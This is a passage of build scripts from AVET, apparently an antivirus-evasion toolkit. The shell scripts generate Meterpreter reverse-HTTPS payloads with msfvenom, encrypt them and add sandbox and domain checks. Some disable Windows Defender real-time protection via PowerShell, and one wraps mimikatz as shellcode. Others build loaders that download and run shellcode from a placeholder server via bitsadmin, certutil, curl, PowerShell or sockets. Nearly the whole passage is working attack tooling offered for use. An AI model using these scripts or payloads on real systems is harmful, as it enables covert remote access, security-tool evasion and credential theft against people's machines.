crypto key source 47 | set_decoder none 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode 55 | 56 | # compile to exe file 57 | $win32_compiler -o output/calcfrompowersh_50xshikata_revhttps_win32.exe source/avet.c 58 | strip output/calcfrompowersh_50xshikata_revhttps_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # Execute the following command: 66 | # $ calcfrompowersh_50xshikata_revhttps_win32.exe 67 | " 68 | -------------------------------------------------------------------------------- /build/build_checkdomain_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Checks the DNS domain the target is in, and exits without executing the payload if not in specified domain (test.testdomain.info). 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . build/feature_construction.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # enable debug output 28 | enable_debug_print 29 | # generate key file with preset key 30 | generate_key preset aabbccdd1122 input/key_raw.txt 31 | #CONFIGURATION_END 32 | 33 | ## terminate program if target is not in specified domain 34 | add_evasion get_computer_domain test.testdomain.info 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 66 | # compile to exe file 67 | $win64_compiler -o output/checkdomain_rc4_mimikatz.exe source/avet.c 68 | strip output/checkdomain_rc4_mimikatz.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | 74 | echo " 75 | # The decryption key is aabbccdd1122 if it has not been changed. 76 | # You need to provide the decryption key as 2nd command line argument. 77 | # Call generated executable on target like: 78 | # $ checkdomain_rc4_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 79 | " 80 | -------------------------------------------------------------------------------- /build/build_cpucores_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata and perform get_cpu_cores sandbox evasion. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # generate payload and call avet 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # exit if target has less than 2 cpu cores 40 | add_evasion get_cpu_cores 2 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | set_decoder none 47 | set_key_source no_data 48 | 49 | # set payload info source 50 | set_payload_info_source no_data 51 | 52 | # set shellcode binding technique 53 | set_payload_execution_method exec_shellcode 54 | 55 | # compile 56 | $win32_compiler -o output/cpucores_revhttps_win32.exe source/avet.c -lws2_32 57 | strip output/cpucores_revhttps_win32.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | 63 | echo " 64 | # Execute the following command: 65 | # $ cpucores_revhttps_win32.exe 66 | " 67 | -------------------------------------------------------------------------------- /build/build_disablewindefpsh_xorfromcmd_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Execute 64-bit shellcode. 6 | # Encrypts the payload with a dynamic XOR key, which needs to be provided via command line argument 2 to decrypt. 7 | # Attempts to disable Windows Defender's real-time protection via Powershell command "Set-MpPreference -DisableRealtimeMonitoring $true". 8 | #DESCRIPTION_END 9 | 10 | 11 | # print AVET logo 12 | cat banner.txt 13 | 14 | # include script containing the compiler var $win64_compiler 15 | # you can edit the compiler in build/global_win64.sh 16 | # or enter $win64_compiler="mycompiler" here 17 | . build/global_win64.sh 18 | 19 | # import feature construction interface 20 | . build/feature_construction.sh 21 | 22 | # import global default lhost and lport values from build/global_connect_config.sh 23 | . build/global_connect_config.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # override connect-back settings here, if necessary 28 | LPORT=$GLOBAL_LPORT 29 | LHOST=$GLOBAL_LHOST 30 | # generate key file 31 | generate_key preset aabbccddee input/key_raw.txt 32 | # enable debug output 33 | enable_debug_print 34 | #CONFIGURATION_END 35 | 36 | 37 | # make meterpreter reverse payload 38 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -f raw --platform Windows > input/sc_raw.txt 39 | 40 | # try to disable Windows Defender's real-time protection via powershell 41 | set_command_source static_from_here 'Set-MpPreference -DisableRealtimeMonitoring $true' 42 | set_command_exec exec_via_powershell 43 | 44 | 45 | 46 | # encrypt payload 47 | encode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt 48 | 49 | # convert to c array format for static include 50 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 51 | 52 | # set encrypted payload as source 53 | set_payload_source static_from_file input/scenc_c.txt 54 | 55 | # set decoder and key source 56 | # key is retrieved in hex format from command line 57 | set_decoder xor 58 | set_key_source from_command_line_hex 59 | 60 | # set payload info source 61 | set_payload_info_source no_data 62 | 63 | # set shellcode binding technique 64 | set_payload_execution_method exec_shellcode64 65 | 66 | # call make_avet, compile 67 | $win64_compiler -o output/disablewindefpsh_xorfromcmd_revhttps_win64.exe source/avet.c 68 | strip output/disablewindefpsh_xorfromcmd_revhttps_win64.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | echo " 74 | # The decryption key is aabbccddee if it has not been changed. 75 | # Call on target like: 76 | # disablewindefpsh_xorfromcmd_revhttps_win64.exe first [decryption key] 77 | " 78 | -------------------------------------------------------------------------------- /build/build_dkmc_downloadexecshc_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # +++ WARNING +++ 6 | # Currently, the BMP shellcode does not execute properly! It seems that DKMC generates invalid shellcode. 7 | 8 | # example script for building executables and DKMC payload 9 | # which is nice, this is hiding the shellcode in a valid bitmap file 10 | # DKMC has to be in a directory side by side to avet eg. ~/tools/avet ~/tools/DKMC for running this script 11 | # for more look here https://govolution.wordpress.com/2018/03/02/download-exec-poc-and-dkmc/ 12 | #DESCRIPTION_END 13 | 14 | 15 | # print AVET logo 16 | cat banner.txt 17 | 18 | # include script containing the compiler var $win32_compiler 19 | # you can edit the compiler in build/global_win32.sh 20 | # or enter $win32_compiler="mycompiler" here 21 | . build/global_win32.sh 22 | 23 | # import feature construction interface 24 | . build/feature_construction.sh 25 | 26 | # import global default lhost and lport values from build/global_connect_config.sh 27 | . build/global_connect_config.sh 28 | 29 | 30 | #CONFIGURATION_START 31 | # override connect-back settings here, if necessary 32 | LPORT=$GLOBAL_LPORT 33 | LHOST=$GLOBAL_LHOST 34 | # no command preexec 35 | set_command_source no_data 36 | set_command_exec no_command 37 | # don't enable debug output because printing the whole bmp payload takes a lot of time 38 | #enable_debug_print 39 | #CONFIGURATION_END 40 | 41 | 42 | # make meterpreter reverse payload, format correct for DKMC and run DKMC for making the bitmap file 43 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f c -a x86 --platform Windows > input/sc_c.txt 44 | cd ../DKMC 45 | printf "gen\nset output ../avet/output/sc.bmp\nset shellcode %s\nrun\nexit\nexit\n" `../avet/tools/sh_format/sh_format input/sc_c.txt | tr -d "\n" | tr -d ";" | tr -d "\""` | python dkmc.py 46 | cd ../avet 47 | 48 | # set shellcode source 49 | set_payload_source download_socket 50 | 51 | # set decoder and key source 52 | set_decoder none 53 | set_key_source no_data 54 | 55 | # set payload info source 56 | set_payload_info_source no_data 57 | 58 | # set shellcode binding technique 59 | set_payload_execution_method exec_shellcode 60 | 61 | # compile 62 | $win32_compiler -s -o output/dkmc_downloadexecshc_revhttps_win32.exe source/avet.c -lwsock32 -lws2_32 63 | strip output/dkmc_downloadexecshc_revhttps_win32.exe 64 | 65 | # cleanup 66 | cleanup_techniques 67 | 68 | 69 | echo " 70 | # The generated shellcode must be hosted on a HTTP server. 71 | # Call your executable like: 72 | # dkmc_downloadexecshc_revhttps_win32.exe http://yourserver/sc.bmp 73 | 74 | # The executable will then download the shellcode to memory via sockets (no file is dropped on disk). 75 | # Next, the shellcode is executed. 76 | " 77 | -------------------------------------------------------------------------------- /build/build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Downloads and executes 64-bit shellcode, using bitsadmin. Applies metasploit XOR encoding. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win64_compiler 13 | # you can edit the compiler in build/global_win64.sh 14 | # or enter $win64_compiler="mycompiler" here 15 | . build/global_win64.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print to_file C:/users/public/avetdbg.txt 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload 37 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -b '\x00' -f raw --platform Windows > output/thepayload.bin 38 | 39 | # set shellcode source 40 | set_payload_source download_bitsadmin 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode64 51 | 52 | # enable debug output 53 | enable_debug_print to_file C:/users/public/avetdbg.txt 54 | 55 | # compile 56 | $win64_compiler -o output/downloadbitsadmin_mtrprtrxor_revhttps_win64.exe source/avet.c -lwsock32 -lws2_32 57 | strip output/downloadbitsadmin_mtrprtrxor_revhttps_win64.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | 63 | echo " 64 | # The generated msf shellcode file needs to be hosted on a HTTP server 65 | # Call the executable like: 66 | # $ downloadbitsadmin_mtrprtrxor_revhttps_win64.exe http://yourserver/thepayload.bin 67 | # Downloads the payload to disk, then reads the file and executes the payload. 68 | " 69 | -------------------------------------------------------------------------------- /build/build_downloadbitsadmin_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # build the .exe file that loads the payload from a given text file 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print to_file C:/users/public/avetdbg.txt 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f raw -a x86 -b "\x00" --platform Windows > output/thepayload.bin 38 | 39 | # set shellcode source 40 | set_payload_source download_bitsadmin 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode 51 | 52 | # compile to exe file 53 | $win32_compiler -o output/downloadbitsadmin_revhttps_win32.exe source/avet.c 54 | strip output/downloadbitsadmin_revhttps_win32.exe 55 | 56 | # cleanup 57 | cleanup_techniques 58 | 59 | 60 | echo " 61 | # The generated msf shellcode must be hosted on a HTTP server. 62 | # Call your executable like: 63 | # $ downloadbitsadmin_revhttps_win32.exe http://myserver/thepayload.bin 64 | 65 | # The executable will then download the file via bitsadmin and drop it on the target's disk. 66 | # The downloaded shellcode is then read from the file and executed. 67 | " 68 | -------------------------------------------------------------------------------- /build/build_downloadcertutil_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata, download your payload via certutil. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | # additionaly to the avet encoder, further encoding should be used 38 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f raw -a x86 -b "\x00" --platform Windows > output/thepayload.bin 39 | 40 | # set shellcode source 41 | set_payload_source download_certutil 42 | 43 | # set decoder and key source 44 | set_decoder none 45 | set_key_source no_data 46 | 47 | # set payload info source 48 | set_payload_info_source no_data 49 | 50 | # set shellcode binding technique 51 | set_payload_execution_method exec_shellcode 52 | 53 | # compile to exe file 54 | $win32_compiler -o output/downloadcertutil_revhttps_win32.exe source/avet.c 55 | strip output/downloadcertutil_revhttps_win32.exe 56 | 57 | # cleanup 58 | cleanup_techniques 59 | 60 | 61 | echo " 62 | # The generated msf payload needs to be hosted on a HTTP server 63 | # Call your payload like: 64 | # $ downloadcertutil_revhttps_win32.exe http://myserver/thepayload.bin 65 | 66 | # The executable will download and drop the payload as a file on the target's disk. 67 | # It will then execute the shellcode given in the file. 68 | " 69 | -------------------------------------------------------------------------------- /build/build_downloadcurl_mtrprtrxor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Downloads and executes 64-bit shellcode, using curl. Applies metasploit XOR encoding. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win64_compiler 13 | # you can edit the compiler in build/global_win64.sh 14 | # or enter $win64_compiler="mycompiler" here 15 | . build/global_win64.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print to_file C:/users/public/avetdbg.txt 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload 37 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -b '\x00' -f raw --platform Windows > output/thepayload.bin 38 | 39 | # set shellcode source 40 | set_payload_source download_curl 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode64 51 | 52 | # enable debug output 53 | enable_debug_print to_file C:/users/public/avetdbg.txt 54 | 55 | # compile 56 | $win64_compiler -o output/downloadcurl_mtrprtrxor_revhttps_win64.exe source/avet.c -lwsock32 -lws2_32 57 | strip output/downloadcurl_mtrprtrxor_revhttps_win64.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | 63 | echo " 64 | # The generated msf shellcode file needs to be hosted on a HTTP server 65 | # Call the executable like: 66 | # $ downloadcurl_mtrprtrxor_revhttps_win64.exe http://yourserver/thepayload.bin 67 | # Downloads the payload to disk, then reads the file and executes the payload. 68 | " 69 | -------------------------------------------------------------------------------- /build/build_downloadiexplorer_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Download the payload via internet explorer and execute. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 2 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # Apply AVET encoding 40 | encode_payload avet input/sc_c.txt output/scenc_raw.txt 41 | 42 | # set shellcode source 43 | set_payload_source download_internet_explorer 44 | 45 | # set decoder and key source 46 | # AVET decoder requires no key 47 | set_decoder avet 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode 55 | 56 | # compile 57 | $win32_compiler -o output/downloadiexplorer_revhttps_win32.exe source/avet.c 58 | strip output/downloadiexplorer_revhttps_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # The generated msf shellcode file needs to be hosted on a HTTP server. 66 | # Call the generated executable like: 67 | # $ downloadiexplorer_revhttps_win32.exe http://myserver/scenc_raw.txt 68 | 69 | # The executable will then download the shellcode file via internet explorer and drop the file on disk. 70 | # The shellcode is then read from the file and executed. 71 | " 72 | -------------------------------------------------------------------------------- /build/build_downloadpsh_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # build the .exe file that loads the payload from a given text file 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f raw -a x86 -b "\x00" --platform Windows > output/thepayload.bin 38 | 39 | # set shellcode source 40 | set_payload_source download_powershell 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode 51 | 52 | # compile to exe file 53 | $win32_compiler -o output/downloadpsh_revhttps_win32.exe source/avet.c 54 | strip output/downloadpsh_revhttps_win32.exe 55 | 56 | # cleanup 57 | cleanup_techniques 58 | 59 | 60 | echo " 61 | # The generated msf shellcode must be hosted on a HTTP server. 62 | # Call your executable like: 63 | # $ downloadpsh_revhttps_win32.exe http://myserver/thepayload.bin 64 | # The executable will then download the file via powershell and drop it on the target's disk. 65 | # The downloaded shellcode is then read from the file and executed. 66 | " 67 | -------------------------------------------------------------------------------- /build/build_downloadsocket_mtrprtrxor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Downloads and executes 64-bit shellcode, using sockets. Applies metasploit XOR encoding. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win64_compiler 13 | # you can edit the compiler in build/global_win64.sh 14 | # or enter $win64_compiler="mycompiler" here 15 | . build/global_win64.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | #CONFIGURATION_START 24 | # override connect-back settings here, if necessary 25 | LPORT=$GLOBAL_LPORT 26 | LHOST=$GLOBAL_LHOST 27 | # no command preexec 28 | set_command_source no_data 29 | set_command_exec no_command 30 | # enable debug output 31 | enable_debug_print 32 | #CONFIGURATION_END 33 | 34 | 35 | # make meterpreter reverse payload 36 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -b '\x00' -f raw --platform Windows > output/thepayload.bin 37 | 38 | # set shellcode source 39 | set_payload_source download_socket 40 | 41 | # set decoder and key source 42 | set_decoder none 43 | set_key_source no_data 44 | 45 | # set payload info source 46 | set_payload_info_source no_data 47 | 48 | # set shellcode binding technique 49 | set_payload_execution_method exec_shellcode64 50 | 51 | # compile 52 | $win64_compiler -o output/downloadsocket_mtrprtrxor_revhttps_win64.exe source/avet.c -lwsock32 -lws2_32 53 | strip output/downloadsocket_mtrprtrxor_revhttps_win64.exe 54 | 55 | # cleanup 56 | cleanup_techniques 57 | 58 | 59 | echo " 60 | # The generated msf shellcode file needs to be hosted on a HTTP server 61 | # Call the executable like: 62 | # $ downloadsocket_mtrprtrxor_revhttps_win64.exe http://yourserver/thepayload.bin 63 | # The executable downloads the shellcode into memory (no file is dropped on disk) and executes it. 64 | " 65 | -------------------------------------------------------------------------------- /build/build_downloadsocket_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Download the shellcode via sockets. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -b '\x00' -f raw -a x86 --platform Windows > output/thepayload.bin 38 | 39 | # set shellcode source 40 | set_payload_source download_socket 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode 51 | 52 | # compile to exe file 53 | $win32_compiler -o output/downloadsocket_revhttps_win32.exe source/avet.c -lwsock32 -lws2_32 54 | strip output/downloadsocket_revhttps_win32.exe 55 | 56 | # cleanup 57 | cleanup_techniques 58 | 59 | echo " 60 | # The generated msf payload needs to be hosted on a HTTP server 61 | # Call your executable like: 62 | # $ downloadsocket_revhttps_win32.exe http://yourserver/thepayload.bin 63 | # The executable will then download, read the file into memory via sockets (no file is dropped on disk) and finally execute the downloaded shellcode. 64 | " 65 | -------------------------------------------------------------------------------- /build/build_dynamicfromfile_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # build the .exe file that loads the payload from a given text file 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | # additionaly to the avet encoder, further encoding should be used 38 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -b '\x00' -f raw -a x86 --platform Windows > output/thepayload.bin 39 | 40 | # set shellcode source 41 | set_payload_source dynamic_from_file 42 | 43 | # set decoder and key source 44 | set_decoder none 45 | set_key_source no_data 46 | 47 | # set payload info source 48 | set_payload_info_source no_data 49 | 50 | # set shellcode binding technique 51 | set_payload_execution_method exec_shellcode 52 | 53 | # compile to exe file 54 | $win32_compiler -o output/dynamicfromfile_revhttps_win32.exe source/avet.c 55 | strip output/dynamicfromfile_revhttps_win32.exe 56 | 57 | # cleanup 58 | cleanup_techniques 59 | 60 | 61 | echo " 62 | # Call the generated executable like: 63 | # $ dynamicfromfile_revhttps_win32.exe thepayload.bin 64 | " 65 | -------------------------------------------------------------------------------- /build/build_eval_adversarial_dos.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # print AVET logo 4 | cat banner.txt 5 | 6 | # include script containing the compiler var $win64_compiler 7 | # you can edit the compiler in build/global_win64.sh 8 | # or enter $win64_compiler="mycompiler" here 9 | . build/global_win64.sh 10 | 11 | # import feature construction interface 12 | . build/feature_construction.sh 13 | 14 | 15 | 16 | FILES="input/malware-filtered2/*" 17 | N=3 18 | practical_manipulation="full_dos" 19 | population_size=100 20 | section_size=5 21 | 22 | for f in $FILES 23 | do 24 | ((i=i%N)); ((i++==0)) && wait 25 | 26 | ( cp $f output/ 27 | 28 | # generate adversarial example 29 | $genetic_optimizer -ss $section_size -pm $practical_manipulation -p $population_size output/$(basename "$f") 30 | 31 | # cleanup 32 | rm output/$(basename "$f") 33 | # cleanup_techniques 34 | ) & 35 | done 36 | 37 | wait -------------------------------------------------------------------------------- /build/build_eval_adversarial_extend.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # print AVET logo 4 | cat banner.txt 5 | 6 | # include script containing the compiler var $win64_compiler 7 | # you can edit the compiler in 